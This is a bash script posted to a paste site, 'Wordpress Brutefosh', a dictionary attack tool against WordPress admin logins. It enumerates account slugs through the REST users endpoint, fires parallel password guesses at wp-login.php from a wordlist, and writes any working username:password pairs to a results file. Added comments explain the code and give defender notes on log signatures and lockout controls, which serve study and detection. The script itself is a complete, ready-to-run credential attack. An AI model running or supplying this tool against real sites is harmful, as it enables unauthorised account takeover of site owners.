zerobyte-id

[BASH] Wordpress Brutefosh 1.0

Mar 28th, 2019
  1. #!/bin/bash
  2. # Name       : Wordpress Brutefosh
  3. # Version    : 1.2
  4. # Desc.      : Dictionary Attack Tool - Wordpress Admin
  5. # Coded by   : Schopath
  6. # Website    : www.zerobyte.id
  7. # Updated on : 2019-03-28
  8.  
  9. #----------- CONFIGURATION -----------
      # Seconds; handed to both --connect-timeout and --max-time on every curl
      # call in this script, so it caps each individual request.
  10. curl_timeout=20
      # Batch size for the background login attempts started in the main loops:
      # up to this many requests run in parallel before the script waits.
  11. multithread_limit=10
  12. #--------- CONFIGURATION EOF ---------
  13.  
      # Delete a username list left by an earlier run; the main flow later uses
      # the existence of wpusername.tmp to decide whether enumeration succeeded.
  14. if [[ -f wpusername.tmp ]]
  15. then
  16.     rm wpusername.tmp
  17. fi
      # ANSI colour escapes, expanded by the `echo -e` calls further down.
  18. RED='\e[31m'
  19. GRN='\e[32m'
  20. YEL='\e[33m'
  21. CLR='\e[0m'
  22.  
  23. function _GetUserWPJSON() {
          # Collects account slugs from the target's REST user listing.
          # Arguments: $1 - base URL of the site.
          # Globals:   curl_timeout, YEL, CLR (read); Target, UsernameLists and
          #            Username (written - none of them is declared local).
          # Outputs:   progress lines on stdout; one slug per line in
          #            ./wpusername.tmp, created only when at least one slug matched.
          #
          # Defender note: the request below is a GET of /wp-json/wp/v2/users with
          # no credentials attached. Hits on that path in access logs are an
          # account-enumeration signal, and a site that requires authentication
          # for the users route should leave the grep below with nothing to match.
  24.     Target="${1}";
          # grep -P: \K discards the matched `"slug":"` prefix and the lookahead
          # stops at the next double quote, so only the slug values are printed.
  25.     UsernameLists=$(curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s "${Target}/wp-json/wp/v2/users" | grep -Po '"slug":"\K.*?(?=")');
  26.     echo ""
  27.     if [[ -z ${UsernameLists} ]];
  28.     then
  29.         echo -e "${YEL}INFO: Cannot detect Username!${CLR}"
  30.     else
              # echo with no text and -n writes nothing: this only creates or
              # truncates the file before the loop appends to it.
  31.         echo -ne > wpusername.tmp
              # Unquoted expansion: the captured output is split on whitespace.
  32.         for Username in ${UsernameLists};
  33.         do
  34.             echo "INFO: Found username \"${Username}\"..."
  35.             echo "${Username}" >> wpusername.tmp
  36.         done
  37.     fi
  38. }
  39.  
  40. function _TestLogin() {
          # Submits one username/password pair to the target's login form and
          # prints how the response was classified.
          # Arguments: $1 - base URL, $2 - username, $3 - password.
          # Globals:   curl_timeout, YEL, GRN, CLR (read); Target, Username,
          #            Password, LetsTry (written - not declared local).
          # Outputs:   one status line on stdout; pairs classified as valid are
          #            also appended, in clear text, to ./wpbf-results.txt.
          #
          # Defender note: each call is a single POST to /wp-login.php carrying the
          # form fields log, pwd and wp-submit; no cookie or User-Agent option is
          # set on the command line. Repeated POSTs of this shape from one client
          # are the server-side signature of this script. Per-account and
          # per-source throttling or lockout, and a second factor on privileged
          # accounts, are the controls that apply. On a host where the script was
          # run, wpbf-results.txt, wpusername.tmp and wplogin.tmp are the files
          # it leaves in the working directory.
  41.     Target="${1}"
  42.     Username="${2}"
  43.     Password="${3}"
          # -w appends a marker line holding the HTTP status code after the body
          # so that body and status can be read from the same captured string.
  44.     LetsTry=$(curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s -w "\nHTTP_STATUS_CODE_X %{http_code}\n" "${Target}/wp-login.php" --data "log=${Username}&pwd=${Password}&wp-submit=Log+In" --compressed)
          # Classified as invalid when the response contains both "login_error"
          # and "div".
  45.     if [[ ! -z $(echo ${LetsTry} | grep login_error | grep div) ]];
  46.     then
  47.         echo -e "${YEL}INFO: Invalid ${Target} ${Username}:${Password}${CLR}"
          # Otherwise classified as valid when the value extracted by the awk
          # stage equals 302.
  48.     elif [[ $(echo ${LetsTry} | grep "HTTP_STATUS_CODE_X" | awk '{print $2}') == "302" ]];
  49.     then
  50.         echo -e "${GRN}[!] FOUND ${Target} \e[30;48;5;82m ${Username}:${Password} ${CLR}"
              # Appended, never truncated: the file accumulates across runs.
  51.         echo "${Target} [${Username}:${Password}]" >> wpbf-results.txt
  52.     else
              # Anything else is reported with the same message as the first branch.
  53.         echo -e "${YEL}INFO: Invalid ${Target} ${Username}:${Password}${CLR}"
  54.     fi
  55. }
  56.  
  57. echo ' _    _               _                         '
  58. echo '| |  | | ___  _ __ __| |_ __  _ __ ___  ___ ___ '
  59. echo '| |/\| |/ _ \| `__/ _` | `_ \| `__/ _ \/ __/ __|'
  60. echo '\  /\  / (_) | | | (_| | |_) | | |  __/\__ \__ \'
  61. echo ' \/  \/ \___/|_|  \__,_| .__/|_|  \___||___/___/'
  62. echo '                       |_|.::Brutefo(sh) 2019::.'
  63. echo ''
  64.  
      # The banner above is cosmetic. The base URL is read interactively and
      # stored in the global Target.
  65. echo -ne "[?] Input website target : "
  66. read Target
  67.  
      # Pre-flight check: fetch the login page into ./wplogin.tmp and continue
      # only if it contains the string "wp-submit". Nothing in this listing
      # removes wplogin.tmp afterwards.
  68. curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s "${Target}/wp-login.php" > wplogin.tmp
  69. if [[ -z $(cat wplogin.tmp | grep "wp-submit") ]];
  70. then
  71.     echo -e "${RED}ERROR: Invalid wordpress wp-login!${CLR}"
          # Bare `exit`: the exit status is that of the echo just above.
  72.     exit
  73. fi
  74.  
  75. echo -ne "[?] Input password lists in (file) : "
      # Path of the wordlist, read interactively into the global PasswordLists.
  76. read PasswordLists
  77.  
      # Stop unless the path names an existing regular file.
  78. if [[ ! -f ${PasswordLists} ]]
  79. then
  80.     echo -e "${RED}ERROR: Wordlists not found!${CLR}"
          # Bare `exit`: the exit status is that of the echo just above.
  81.     exit
  82. fi
  83.  
  84. _GetUserWPJSON ${Target}
  85.  
      # wpusername.tmp exists only if _GetUserWPJSON extracted at least one slug,
      # so this test selects between enumerated and manually entered usernames.
      #
      # Defender note: seen from the server, the loops below produce, for each
      # username, waves of up to multithread_limit near-simultaneous POSTs to
      # /wp-login.php from one client, each wave starting once the previous one
      # has completed.
  86. if [[ -f wpusername.tmp ]]
  87. then
  88.     for User in $(cat wpusername.tmp)
  89.     do
              # Subshell: cthread and the background jobs are scoped to one user.
  90.         (
                  # Unquoted $(cat ...): the wordlist is split on whitespace, so
                  # every whitespace-separated token is one candidate.
  91.             for Pass in $(cat ${PasswordLists})
  92.             do
                      # Batch limiter: cthread wraps modulo multithread_limit; when
                      # it wraps to 0 the shell waits for all outstanding jobs.
  93.                 ((cthread=cthread%multithread_limit)); ((cthread++==0)) && wait
  94.                 _TestLogin ${Target} ${User} ${Pass} &
  95.             done
                  # Collect the last, possibly partial, batch.
  96.             wait
  97.         )
  98.     done
  99. else
  100.     echo -e "${YEL}INFO: Cannot find username${CLR}"
  101.     echo -ne "[?] Input username manually : "
  102.     read User
  103.  
          # NOTE(review): the test is on PasswordLists although the message
          # refers to the username; User itself is not checked here.
  104.     if [[ -z ${PasswordLists} ]]
  105.     then
  106.         echo -e "${RED}ERROR: Username cannot be empty!${CLR}"
  107.         exit
  108.     fi
  109.     echo ''
          # Same batch loop as in the branch above, for the single entered user.
  110.     (
  111.         for Pass in $(cat ${PasswordLists})
  112.         do
  113.             ((cthread=cthread%multithread_limit)); ((cthread++==0)) && wait
  114.             _TestLogin ${Target} ${User} ${Pass} &
  115.         done
  116.         wait
  117.     )
  118. fi
      # Summary: number of distinct lines in wpbf-results.txt that match Target.
      # _TestLogin only ever appends to that file, so lines from earlier runs
      # against the same target are included in the count.
  119. echo "INFO: Found $(cat wpbf-results.txt | grep ${Target} | sort -nr | uniq | wc -l) username & password in ./wpbf-results.txt"